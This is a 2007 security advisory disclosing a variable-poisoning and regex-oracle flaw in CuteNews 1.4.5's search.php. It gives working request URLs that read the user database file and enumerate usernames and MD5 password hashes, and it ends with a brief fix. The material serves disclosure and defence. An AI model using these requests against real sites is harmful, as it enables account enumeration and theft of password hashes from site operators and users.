Author: Janek Vind "waraxe"
Date: 24. December 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-60.html
Vulnerable software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cute news is a powerful and easy to use news management system that
uses flat files to store its database. It supports commenting,
archives, search function, file upload management, backup & restore,
IP banning, flood protection ...
Homepage: http://cutephp.com/
Vulnerabilities: Sensitive info disclosure in "search.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's look @ "search.php" source code ~line 158:
-------------------------->[source code]<----------------------------
if($dosearch == "yes")
{
...
$story = trim($story);
if($search_in_archives){
...
$files_arch[] = "$cutepath/data/archives/$file";
...
$files_arch[] = "$cutepath/data/news.txt";
------------------------->[/source code]<----------------------------
Hmm, let's see - "$files_arch" array is uninitialized before using
for file pathes storing. How about good old variable poisoning?
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=waraxe
and nice error message appears:
Warning: file(waraxe) [function.file]: failed to open stream:
No such file or directory in
C:apache_wwwrootcutenews.1.4.5search.php on line 188
So it seems possible to trick this search script for opening arbitrary
local files. How about "users.db.php", which contains user credentials?
Testing:
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=./data/users.db.php
No error messages! Search script will open user database file and will
try to parse it. Is it exploitable?
Let's have second look @ vulnerable script source:
-------------------------->[source code]<----------------------------
foreach($files_arch as $file)
{
...
$all_news_db = file("$file");
foreach($all_news_db as $news_line){
$news_db_arr = explode("|",$news_line);
...
if($title and @preg_match("/$title/i", "$news_db_arr[2]")){ $ftitle = TRUE; }
if($user and @preg_match("/$user/i", "$news_db_arr[1]")){ $fuser = TRUE; }
if($story and (@preg_match("/$story/i", "$news_db_arr[4]") ...
...
if($fdate and $ftitle and $fuser and $fstory){ $found_arr[$news_db_arr[0]] = $archive; }
...
echo"<br /><b>Founded News articles [". count($found_arr)."]:</b><br />";
------------------------->[/source code]<----------------------------
Title, user and story variables are coming directly from GPC, so another
insecurity feature - regex manipulation - is available for us to exploit.
Let's assume, that username "john" is non valid and "waraxe" is valid
username in current Cutenews installation.
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=waraxe&files_arch[]=./data/users.db.php
... and we see "Founded News articles [1]"
Now let's try nonexistent user:
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=john&files_arch[]=./data/users.db.php
... and response is different: "Founded News articles [0]"
We have just seen, how username can be "pinged" from database file.
Now, let's get more serious:
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&story=^[a-f0-9]{32}$&files_arch[]=./data/users.db.php
... and we see "Founded News articles [5]", which shows users count
in database with standard md5 hashes.
Sorry about long and boring storytelling, i will make it short now:
by using security vulnerabilities described above any attacker can
retrieve usernames and password md5 hashes from userdata file within
minutes. I have written two PoC scripts, "cuteuser.php" and "cutemd5.php",
which will allow to enumerate usernames and fetch password hashes from
most Cutenews targets as for today. Exploitable is newest version 1.4.5,
but older versions are vulnerable too, including CuteNews v1.3.1
Exploits are available at http://www.waraxe.us/tools/
Questions about this advisory or PoC scripts can be asked in forum:
http://www.waraxe.us/forums.html
//-----> See ya soon and have a nice day ;) <-----//
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Initialize variables before use! In this way php variable poisoning
related security issues can be mitigated.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Biography Database - http://www.biosaxe.com/
Old books online - http://www.oldreadings.com/
---------------------------------- [ EOF ] --------------------------
Copyright © by Waraxe IT Security Portal All Right Reserved.
Published on: 2007-12-23 (12645 reads)
[ Go Back ]